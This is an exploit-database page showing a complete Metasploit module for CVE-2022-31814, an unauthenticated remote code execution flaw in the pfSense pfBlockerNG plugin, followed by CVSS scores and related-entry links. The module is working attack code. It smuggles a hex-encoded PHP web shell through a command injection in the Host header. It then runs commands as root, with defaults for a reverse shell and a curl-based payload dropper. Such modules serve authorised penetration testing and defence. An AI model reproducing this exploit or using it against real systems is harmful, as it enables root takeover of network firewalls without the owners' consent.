Lucene search
Metasploit1337DAY-ID-38036HistoryOct 17, 2022 - 12:00 a.m.
pfSense pfBlockerNG 2.1.4_26 Shell Upload Exploit
2022-10-1700:00:00
metasploit
0day.today
149
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.972 High
EPSS
Percentile
99.8%
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'pfSense plugin pfBlockerNG unauthenticated RCE as root',
'Description' => %q{
pfBlockerNG is a popular pfSense plugin that is not installed by default. Itβs generally used to
block inbound connections from whole countries or IP ranges. Versions 2.1.4_26 and below are affected
by an unauthenticated RCE vulnerability that results in root access. Note that version 3.x is unaffected.
},
'Author' => [
'IHTeam', # discovery
'jheysel-r7' # module
],
'References' => [
[ 'CVE', '2022-31814' ],
[ 'URL', 'https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/']
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Privileged' => false,
'Arch' => [ ARCH_CMD ],
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_openssl'
}
}
],
[
'BSD Dropper',
{
'Platform' => 'bsd',
'Arch' => [ARCH_X64],
'Type' => :bsd_dropper,
'CmdStagerFlavor' => [ 'curl' ],
'DefaultOptions' => {
'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'
}
}
]
],
'DefaultTarget' => 1,
'DisclosureDate' => '2022-09-05',
'DefaultOptions' => {
'SSL' => true,
'RPORT' => 443
},
'Notes' => {
'Stability' => [ CRASH_SERVICE_DOWN ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION, ]
}
)
)
register_options(
[
OptString.new('WEBSHELL_NAME', [
false, 'The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unset.', nil
])
]
)
end
def upload_shell
print_status 'Uploading shell...'
if datastore['WEBSHELL_NAME'].blank?
@webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"
else
@webshell_name = "#{datastore['WEBSHELL_NAME']}.php"
end
@parameter_name = Rex::Text.rand_text_alpha(4..12)
print_status("Webshell name is: #{@webshell_name}")
web_shell_contents = <<~EOF
<?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php echo(passthru($_POST["#{@parameter_name}"]));');
EOF
encoded_php = web_shell_contents.unpack('H*')[0].upcase
send_request_raw(
'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
'headers' => {
'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '"
}
)
sleep datastore['WfsDelay']
register_file_for_cleanup("/usr/local/www/#{@webshell_name}")
end
def check
upload_shell
check_resp = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}"),
'vars_post' => {
@parameter_name.to_s => 'id'
}
)
return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || check_resp.body.nil? || !check_resp.body.include?('uid=0(root) gid=0(wheel)')
Exploit::CheckCode::Vulnerable
end
def execute_command(cmd, _opts = {})
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, @webshell_name),
'headers' => {
'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8'
},
'vars_post' => {
@parameter_name.to_s => cmd
}
})
end
def exploit
upload_shell unless datastore['AutoCheck']
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :bsd_dropper
execute_cmdstager
end
end
end
Related
githubexploit
githubexploit
Exploit for OS Command Injection in Netgate Pfblockerng
2023-03-26 00:18:04
Exploit for OS Command Injection in Netgate Pfblockerng
2023-03-05 00:56:14
Exploit for OS Command Injection in Netgate Pfblockerng
2023-03-01 13:24:29
cvelist
cvelist
CVE-2022-31814
2022-09-05 00:00:00
CVE-2022-40624
2022-12-20 00:00:00
cve
cve
CVE-2022-31814
2022-09-05 16:15:08
CVE-2022-40624
2022-12-20 15:15:11
nuclei
nuclei
pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection
2022-09-19 14:12:25
packetstorm
packetstorm
pfBlockerNG 2.1.4_26 Remote Code Execution
2023-02-27 00:00:00
pfSense pfBlockerNG 2.1.4_26 Shell Upload
2022-10-17 00:00:00
prion
prion
Design/Logic Flaw
2022-09-05 16:15:00
Design/Logic Flaw
2022-12-20 15:15:00
nvd
nvd
CVE-2022-31814
2022-09-05 16:15:08
CVE-2022-40624
2022-12-20 15:15:11
vulnrichment
vulnrichment
CVE-2022-31814
2022-09-05 00:00:00
zdt
zdt
pfBlockerNG 2.1.4_26 - Remote Code Execution Exploit
2023-02-21 00:00:00
exploitdb
exploitdb
pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)
2023-02-20 00:00:00
rapid7blog
rapid7blog
Metasploit Wrap-Up
2022-10-14 17:03:46
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.972 High
EPSS
Percentile
99.8%
Related for 1337DAY-ID-38036